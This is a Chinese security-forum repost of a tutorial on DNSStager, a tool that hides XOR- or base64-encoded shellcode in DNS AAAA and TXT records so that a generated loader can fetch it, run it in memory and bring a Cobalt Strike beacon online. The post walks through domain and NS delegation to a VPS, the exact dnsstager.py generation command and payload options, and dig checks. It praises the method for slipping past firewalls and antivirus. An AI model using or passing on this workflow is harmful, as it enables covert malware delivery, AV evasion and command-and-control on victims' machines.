设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 DNSStager-DNS分离shellcode
返回列表 发新帖
查看: 2040|回复: 0

DNSStager-DNS分离shellcode

[复制链接]
1337163122

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-6-5 09:56:35 | 显示全部楼层 |阅读模式
DNSStager-DNS分离shellcode原创 伞 HACK学习呀 昨天
1.DNSStager介绍

类似于shellcode分离免杀的思路,DNSStager是用来帮助红队人员执行在DNS隐藏多段shellcode,通过多次请求dns查询,达到加载shellcode内容然后上线的目的。
其原理是:将你申请的根域名(如gendns.tk)作为ns服务器,提供test.gendns.tk子域名的解析服务,然后工具在本地对test.gendns.tk建立多个AAAA记录的IPV6地址,生成运行程序循环请求这些个记录,拼接AAAA记录作为shellcode加载,从而达到上线的目的。

优点:
1加载shellcode为外部dns请求,防火墙很少拦截。
2使用xor加密程序运行,免杀部分AV。

工具基于多个DNS记录,如开源工具 IPv6  和TXT  并再注入到内存中并运行它。

官方地址:https://shells.systems/unveiling ... our-payload-in-dns/
DNSStager将创建一个伪造的DNS服务器,该服务器将根据AAAA和TXT记录解析您的域的伪造地址,这些地址将呈现您的有效负载的一部分,该净荷已编码/加密并可供代理使用。

2.DNSStager使用条件
要安装DNSStager,您需要首先使用以下命令从官方存储库中克隆它:

git clone https://github.com/mhaskar/DNSStager
然后使用以下命令安装DNSStager的所有python要求:
pip3 install -r requirements.txt
此外需要注意的是,需要禁用本机的systemd-resolved服务:
  1. sudo service systemd-resolved stop
  2. sudo systemctl disable systemd-resolved
复制代码
环境可选c。
golang;c需要安装ming-w64(这里推荐ubuntu、kali系统,centos上楼主尝试多次安装ming-w64均失败):

golang需要GoLang version 1.16.3,并安装
  • golang.org/x/sys
  • github.com/miekg/dns

这两个第三方依赖库(golang扩展目前还未复现成功,go-1.16各种坑)。

3.域名的配置
使用DNSStager作为shellcode存储媒介,当然要有一个域名,可在美国freenom等服务商处申请(楼主各种失败,最后只能花钱买一个),申请好后需要解析NS
到第三方域名服务商,例如dnspod,cloudflare,在这些地方添加子域名test.gendns.tk的NS记录到你自己的vps才可以。
前提:VPS对外开放53端口的UDP数据,提供NS查询。
具体如何使用cloudflare请参考《实战填坑 | CS使用CDN隐藏C2》

https://mp.weixin.qq.com/s/B30Unfh5yAN4A151P1gsMQ

CDN配置以cloudflare为例,在DNS选项处添加NS记录:

最后的效果:

在你填写的vps中下载工具,使用方法(payload以x64/c/ipv6为例):
dnsstager.py --domain test.gendns.tk --payload x64/c/ipv6 --output /home/a.exe --prefix cloud-srv- --shellcode_path /home/DNSStager/payload.bin --sleep 1 --xorkey 0x10
其中payload有多种,使用python 3 dnsstager.py –payloads查看:
  1. x64/c/ipv6      Resolve your payload as IPV6 addresses xored with custom key via compiled x64 C code
  2. x86/c/ipv6      Resolve your payload as IPV6 addresses xored with custom key via compiled x86 C code
  3. x64/golang/txt      Resolve your payload as TXT records encoded using base64 compiled x64 GoLang code
  4. x64/golang/ipv6      Resolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x64 GoLang code
  5. x86/golang/txt      Resolve your payload as TXT records encoded using base64 compiled x86 GoLang code
  6. x86/golang/ipv6      Resolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x86 GoLang code
复制代码
注意:其中--prefix cdn参数的cloud-srv-可自由配置,就是在test.gendns.tk之前添加NS子域名,作为多个shellcode分片存储媒介。

4.工具的使用
在运行工具后会在本机监听53端口:
​操作之前使用dig命令可检查ns域名:dig AAAA cloud-srv-0.test.gendns.tk
未成功时:

已经插入了AAAA记录:

使用dig命令查询会看到记录,运行程序后监听端也会看到:

提示共需要发送56次dns查询请求才能加载完毕shellcode:DNSStager will send 56 DNS requests to get the full payload,意为在vps建立了56个cloud-srv-*.test.gendns.tk NS记录。
wireshark抓包可见请求AAAA记录:

最后CS上线:

免杀效果



回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 06:25 , Processed in 0.013663 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表